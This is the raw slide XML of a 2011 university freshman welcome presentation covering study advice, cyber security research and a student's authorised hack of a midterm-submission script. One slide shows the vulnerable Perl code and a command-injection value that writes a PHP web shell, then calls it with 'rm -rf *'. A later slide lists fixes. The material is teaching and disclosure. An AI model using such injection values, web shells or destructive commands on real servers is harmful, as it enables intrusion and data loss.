        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1103313"/>
            <a:ext cx="8410575" cy="2806922"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Study hard on Math and Science courses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Practice often and enhance your programming and system building skills.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Improve your soft skills, participate in student club activities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19093549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Improve Cyber Security </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="849313"/>
            <a:ext cx="8410575" cy="6888039"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Recognize Security incidents are unavoidable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>misconfigurations on new switches/routers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compromised machines in dormitory/labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We all tried Monday morning and virus definition may not updated yet!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Patch frequently and ASAP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mplement fast incident response; frequent monitoring/alerting/warning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Research Projects:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Intrusion Tolerance by Multipath  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ndirect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>outing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Outpace: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Defense with IP Address Hopping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure Information Sharing for Disaster Relief.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309302808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Hacking Midterm for Fun and Grade</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1103313"/>
            <a:ext cx="8410575" cy="2492990"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Mike </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Gerscheske</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, a student in our MEIA program asked to hack my web application for submitting the midterm.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>I approved and he succeeded! (add a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> script for executing any command on the sever)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>He wrote a paper/presentation on this effort</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>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3009900"/>
            <a:ext cx="7696200" cy="7188200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293489600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Wrong with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>idterm.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279400" y="925513"/>
            <a:ext cx="8410575" cy="6084743"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t># Author: C. Edward Chow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t># Date:   22 December </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1995</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>examine = $answers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{‘examine'}; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>examine is a hidden tag in web form</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>$class=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>($examine, 0, 5);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"$class\/$examine" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-e "$class\/$examine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>$command="/bin/mail -s \'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$examine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>from " . $login . "\' -c $login\@cs.uccs.edu chow\@cs.uccs.edu &lt; $class\/$examine\/$filename";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system("$command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Hackers can substitute the hidden  class tag with </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>“CS502M2008 &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> exec(\$_GET['command']); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Then run “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>http://cs.uccs.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>/~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>chow/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>-bin/grade/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>a.php?command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF99CC"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is the name of vulnerability?  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCFF99"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>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Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322318330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Fix This Web App Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368300" y="874713"/>
            <a:ext cx="8410575" cy="7238905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Static Code Analysis Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>e.g.RATS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Rough Auditing Tool for Security, Fortify/HP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Perform proper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input Validation Check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hidden tag is not hidden from hackers!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do not make assumption that the return form data are from your own web page.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They can be launched from a script run by a hacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Need to be diligent in revising old web apps.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
